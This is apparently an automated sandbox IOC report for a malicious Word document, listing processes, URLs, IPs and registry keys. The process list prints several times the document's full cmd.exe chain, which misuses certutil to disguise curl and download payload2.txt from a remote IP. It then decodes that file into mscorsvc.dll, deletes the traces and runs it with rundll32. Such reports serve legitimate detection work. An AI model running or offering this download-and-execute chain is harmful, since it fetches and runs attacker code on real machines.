Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit

C:\Windows\System32\certutil.exe

certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt

C:\Windows\System32\certutil.exe

certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt

C:\Windows\System32\certutil.exe

certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

C:\Windows\System32\cmd.exe

C:\Windows\System32\certutil.exe

certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt

C:\Windows\System32\certutil.exe

certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt

C:\Windows\System32\certutil.exe

certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll

C:\Windows\System32\xcopy.exe

xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp

C:\Windows\System32\rundll32.exe

rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

C:\Windows\System32\xcopy.exe

xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp

C:\Windows\System32\rundll32.exe

rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

There are 10 hidden processes, click here to show them.

URLs

Name

Malicious

http://172.104.160.126:8099

unknown

http://172.104.160.

unknown

http://172.104.160.126:8099/payload2.txt

unknown

https://curl.se/docs/hsts.html

unknown

https://aka.ms/vs/17/release/vc_redist.x64.exe

unknown

https://curl.se/docs/copyright.htmlD

unknown

https://curl.se/

unknown

https://aka.ms/WRH

unknown

https://curl.se/libcurl/c/curl_easy_setopt.html

unknown

https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/

unknown

https://curl.se/docs/http-cookies.html

unknown

http://172.104.160.126:80X99

unknown

https://curl.se/docs/copyright.html

unknown

https://curl.se/docs/hsts.html#

unknown

https://azure.status.microsoft/status

unknown

https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

unknown

https://curl.se/P

unknown

https://curl.se/docs/http-cookies.html#

unknown

https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw

172.217.168.14

https://curl.se/docs/sslcerts.html

unknown

https://curl.se/docs/sslcerts.htmlcurl

unknown

There are 11 hidden URLs, click here to show them.

Domains

Name

Malicious

sb-ssl.l.google.com

172.217.168.14

www.google.com

142.250.203.100

Details

Name:	www.google.com
IP:	142.250.203.100
TargetID:	11
Current Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

sb-ssl.google.com

unknown

Details

Name:	sb-ssl.google.com
TargetID:	11
Current Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

172.217.168.14

sb-ssl.l.google.com

United States

239.255.255.250

unknown

Reserved

142.250.203.100

www.google.com

United States

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

6h)

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word

Enabled

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

MTTT

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

;i)

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

/k)

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2B164

2B164